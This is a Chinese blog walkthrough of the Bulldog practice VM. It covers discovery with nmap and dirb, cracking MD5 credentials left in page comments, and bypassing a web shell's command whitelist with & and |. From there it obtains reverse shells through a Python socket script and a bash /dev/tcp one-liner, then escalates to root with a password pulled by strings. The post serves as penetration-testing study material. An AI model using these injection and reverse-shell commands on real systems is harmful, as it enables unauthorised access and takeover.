靶机渗透之Bulldog(五)

最新推荐文章于 2024-04-27 21:56:30 发布
最新推荐文章于 2024-04-27 21:56:30 发布
阅读量341 收藏 2
点赞数 2
分类专栏: 靶机渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42111373/article/details/108049165
版权

一、 主机发现

利用kali发现该靶机

netdiscover -I eth0 -r 192.168.56.102/24

在这里插入图片描述

二、服务识别

利用nmap扫描该靶机服务端口

nmap -sV 192.168.56.102

在这里插入图片描述

三、漏洞利用

1.访问http://192.168.56.102/ 正常访问,尝试爆破子域名等
在这里插入图片描述

2.目录扫描dirb http://192.168.56.102/
在这里插入图片描述

3.发现http://192.168.56.102/admin/login,尝试弱口令登录,失败
在这里插入图片描述

4.发现http://192.168.56.102/dev/,然后访问,查看页面源码,可以看到注释有MD5
的字符串,尝试解密,解密出来bulldog 和 bulldoglover
在这里插入图片描述

5.尝试使用邮箱用户名登录,失败,尝试用邮箱的开头,成功登录
一组nick密码bulldog 二组sarah密码bulldoglover
在这里插入图片描述

6.发现http://192.168.56.102/dev/shell/ 访问

在这里插入图片描述

四、远程代码执行

解法一:
1.发现可能存在命令执行漏洞,尝试输入一些系统命令,发现对命令做了白名单限制,只允许给出的命令
2.尝试使用;执行多个命令,“;”被过滤失败,尝试使用&,&&,|等方式执行多个命令,成功。经过尝试,存在命令执行漏洞
在这里插入图片描述
3.获取反弹shell
a.测试机使用python命令搭建建议web服务(开启80端口)

python -m SimpleHTTPServer 80

在这里插入图片描述
b.在webshell上执行wget命令

pwd & wget http://192.168.56.101 #该IP是kali的

在这里插入图片描述

在这里插入图片描述
c.在kali的web服务的目录下编写shell.py文件

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.10.128",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

在这里插入图片描述
d.在webshell下载shell.py文件

  1. python -m SimpleHTTPServer 80
  2. ls & wget http://192.168.56.101/shell.py
  3. 使用python命令开启80端口,以获取目标文件,需在该文件所在的目录下,使用python命令(一定要在var/www/html)
    在这里插入图片描述
    在这里插入图片描述
    e.在测试机进行监听
nc -vnlp 1234

在这里插入图片描述
f.在webshell执行shell.py,成功获取反弹shell

ls & python shell.py

在这里插入图片描述

提权

a.进入/home目录下,查看是否有其他用户
在这里插入图片描述
b.进入bulldogadmin下,查看历史文件 ls -la
在这里插入图片描述
1.发现隐藏目录.hiddenadmindirectory
2.也可以使用ls -a查看隐藏文件
3.该目录下有两个文件,一个note提示,一个可执行文件
c.进入.hiddenadmindirectory利用strings查看可执行文件中的字符
strings customPermissionApp
在这里插入图片描述
1.可以得到疑似密码:SUPERultH、imatePASH、SWORDyouH、CANTget(这些密码可能与最高权限账号有关)
2.凭经验得密码:SUPERultimatePASSWORDyouCANTget
d.尝试提权 sudo -i
1.无法提权,需打开一个新的终端
2.django用户在sudo组
在这里插入图片描述
e.使用python命令打开一个终端,并进行提权

python -c 'import pty; pty.spawn("/bin/bash")'
sudo -i

在这里插入图片描述
1.python命令打开新终端,虽显示“Permission denied”,但只是执行/bin/bash被拒绝,打开的是python命令下的终端,而不是/root下的终端
2.再次提权成功
在这里插入图片描述
解法二:
由于有echo命令,那么就好操作了
Kali开启监听端口nc -lvnp 6666
在shell界面输入:

echo “bash -i >& /dev/tcp/172.16.111.14/6666 0>&1″ | bash

获取反弹shell
在这里插入图片描述
提权:
1.查看用户cat /etc/passwd
在这里插入图片描述
2.查找bulldogadmin用户的文件:

find / -user bulldogadmin 2>/dev/null

在这里插入图片描述
发现值得关注的文件有:一个是note,一个是customPermissionApp。
/home/bulldogadmin/.hiddenadmindirectory/note
/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
在这里插入图片描述
3. SUPERultHimatePASHSWORDyouHCANTget 尝试去掉其中的H
SUPERultimatePASSWORDyouCANTget
执行命令:

python -c 'import pty;pty.spawn("/bin/bash")'

尝试密码:sudo su 提权成功

五、总结:

首先要爆破出admin和dev页面,利用解密MD5得到的密码登录进系统。然后绕过bulldog的系统限制,反弹shell到kali。当然最重要的是root提权,这方面我做的不够好,有些命令不懂,还要去查的网上的资料。Shell反弹和对于linux系统命令掌握的还是太少,以后要多学习,多记。总之,在渗透测试上还有很长的路要走。
解法二获得shell不稳定 不知道是什么问题

Deilty
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透实验(初学者)
weixin_58445075的博客
04-01 367
CD-1靶机渗透 靶机:CD-1 靶机下载地址:http://www.vulnhub.com/?q=DC-1 攻击机:Kali 镜像可私聊找我要哦~~~~ 第一步:查看ip地址 ifconfig查看攻击机ip(因为我的攻击机和靶机在同网段) 查看靶机ip(同网段存货主机) namp -sP 192.168.60.0/24(根据自己的攻击机网段来进行查看) 第二步:开放80端口 我们可以浏览一下网页 Drupal!!! 这里简单介绍一下 drupal是一个由php语言开...
渗透靶机
T_Tzz的博客
08-04 336
1、Matesploitable3 2、Dvwa 3、Webgoat 4、Sqli-labs 5、Vulnhub 6、upload-labs
漏洞靶机渗透
qq_51690722的博客
11-06 2786
今天我们来讲解如何进行漏洞的靶机渗透 1.首选我们得下一下Metasploitable这个文件,去官网找就行 2.下完了之后我们是这个文件夹 3.直接打开Metasploitable虚拟机文件,并打开kali虚拟机 4.然后进到这个界面 5.首先我们进入Metasploitable需要输入账号密码,账号密码都是msfadmin 6.然后我们要ping出靶机的ip地址,需要使用的命令是:ifconfig 现在我们可以看到ip地址是192.168.52.131 7.pin...
靶机渗透(八)Super-Mario-Host
qq_42180996的博客
05-06 1107
靶机Super-Mario-Host 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(8180端口) 2.目录扫描(dirb) 3.访问/vhosts 4.目录爆破(御剑) ...
渗透项目】靶机DC-4渗透过程
命运的旋律的博客
04-12 355
信息收集 主机发现 nmap -sn 192.168.72.0/24 端口扫描 nmap -sV -T4 -O -sT -Pn -p- 192.168.72.156 --script vuln 访问80端口,是一个登陆界面,页面如下 目录扫描 dirbuster 没有发现其他有价值的目录 漏洞利用 通过对登陆页面的测试,发现该页面缺少防暴力破解的验证机制 通过页面上的提示,尝试...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
CFS三层靶机渗透
qq_61768489的博客
10-17 553
账号密码都是。
CTF之Tr0ll3 靶机渗透(用户信息泄露:登录 文件 ssh私钥)
afei001
07-22 450
     练习环境     攻击机:kali     靶机:Tr0ll: 3     下载地址:https://download.vulnhub.com/tr0ll/Tr0ll3.ova      1.发现靶机,端口探测 root@kali:~# nmap -sP 192.168.1.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 08:01 EDT Nmap scan report for 192.168.1.1 (192.168..
Vulnhub靶机recon: 1渗透
xingjinhao123的博客
03-02 315
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/recon-1,438/ 这是一个基于wprdpress的漏洞,建议使用VirtualBox运行靶机 运行环境 靶机:网络设为桥接,IP地址:192.168.1.15 攻击机:同网段下的kali linux,IP地址:192.168.1.37 开始渗透 运行靶机 获取靶机IP地址 扫描端口 使用工具扫描,发现存在很多wprdpress的漏洞 使用针对wprdpress的工具扫描 wpscan 这里获取了两个用
渗透测试靶机----sickos1.2
久恙502的博客
01-25 488
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
渗透测试之靶机试炼(二)
simple___sunny的博客
01-21 1499
123
VulnHub靶机 DC-9 靶机 详细渗透过程
最新发布
rumil的博客
04-27 1519
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
渗透测试之靶机试炼(九)
simple___sunny的博客
02-22 1013
靶机简介 靶机地址: https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova.torrent 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python nc burp msf 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里...
Vulnhub靶机vulnuni1.0.1渗透
xingjinhao123的博客
03-07 461
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/vulnuni-101,439/ 靶机目标是获取root权限,获取用户的flag,难度是容易 运行环境 靶机:网络设为NAT模式,IP地址:192.168.174.139 攻击机:同网段下的kali linux,IP地址:192.168.174.135 开始渗透 运行靶机 获取靶机IP地址 扫描端口 只开放了一个80端口 扫描目录 爬取网站站点工具使用kali自带的ZAP 开始访问获取的站点和目录 80端口首页,和
HACKNOS-3靶机渗透详解
大熊
06-13 294
靶机收获 sewl 获取字典 cewl IP地址 > bear.txt 爆破密钥:hydra,的使用。
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值